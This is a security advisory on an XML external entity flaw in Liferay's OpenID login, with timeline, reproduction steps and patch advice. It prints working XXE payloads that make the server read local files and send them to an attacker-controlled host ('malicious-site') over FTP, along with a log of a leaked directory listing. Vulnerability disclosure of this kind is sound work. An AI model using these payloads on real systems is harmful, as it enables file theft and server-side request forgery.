XML External Entity XXE vulnerability in OpenID component of Liferay
- Author: Sandro Gauci email@example.com
- Vulnerable version: Liferay 6.2.3 CE GA4 and earlier
- Liferay reference: LPS-58014
- Advisory URL: https://github.com/EnableSecurity/advisories/tree/master/ES2016-01-liferay-xxe
- Report date: March 16 2015
- Liferay patch: August 26 2015
- Liferay advisory: January 18 2016
- Enable Security advisory: June 1 2016
Liferay supports OpenID login which was found to make use of a version
openid4java that is vulnerable to XML External Entity (XXE)
Abuse of the XXE vulnerability can (at least) lead to local file disclosure, server-side request forgery (SSRF) and denial of service. This vulnerability was abused to read local files on the web server that the web application had access to.
How to reproduce the issue
This issue was previously discovered to affect one of Google's web server which was using the same OpenID library.
To abuse this vulnerability, an attacker needs to:
- Force Liferay to make use of OpenID for authentication
- Provide an attacker-controlled URL (web location) as the OpenID URL. This URL should contain malicious XML (see below)
- Upon reading the XML, the OpenID library will attempt to load the external entity on the attacker's web server
- This external entity instructs the library to read a file from local disk and make use of it's contents to load another file from an attacker controlled (custom) FTP server
Thus the contents of the file to be read are sent to the custom FTP server. During exploitation, we had to make use of a fake FTP server (from https://github.com/ONsec-Lab/scripts) to receive the information. However, it might be possible to use HTTP and other protocols too depending on the version of Java used and other variables.
For step 1, the attacker needs to locate the authentication form in Liferay and then click on the OpenID link. The attacker then specifies http://malicious-site as an OpenID URL. This website would contain the following:
<meta http-equiv="X-XRDS-Location" content="http://malicious-site/yadis.xml">
As the OpenID library reads that, it loads
yadis.xml which would contain the
<?xml version="1.0"?> <!DOCTYPE a [ <!ENTITY % asd SYSTEM "http://malicious-site/xxe.xml"> %asd; %rrr; ]> <a></a>
xxe.xml which in turn would contain the following:
<!ENTITY % b SYSTEM "file:///"> <!ENTITY % c "<!ENTITY % rrr SYSTEM 'ftp://malicious-site:443/%b;'>"> %c;
Once the XML interpreter parses these contents, it connects to the FTP site, sending the contents of the root directory on the server as can be seen in the following log:
> sudo ruby xxe-ftp-server.rb FTP. New client connected < USER anonymous < PASS Java1.6.0_21@ > 230 more data please! < TYPE I > 230 more data please! < EPSV ALL > 230 more data please! < EPSV > 230 more data please! < EPRT |1|172.x.x.x|39051| > 230 more data please! < bin > 230 more data please! < boot > 230 more data please! < dev > 230 more data please! < etc > 230 more data please! < home > 230 more data please! ... etc
Directories and also local files could be read using this method.
Note that sometimes the OpenID login method is hidden but the functionality is not disabled from within Liferay itself. In such cases, it is possible to force Liferay to make use of OpenID anyway by setting the
_58_struts_action parameter from
Solutions and recommendations
Upgrading to the latest version of Liferay should address this security vulnerability. The patch was published at the following location: https://sourceforge.net/projects/liferay-patches/files/6.2.3%20GA4/
Additionally, to address this issue it is recommended to disable OpenID support.
About Enable Security
Enable Security provides Information Security services, including Penetration Testing, Research and Development, to help protect client networks and applications against online attackers.
The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.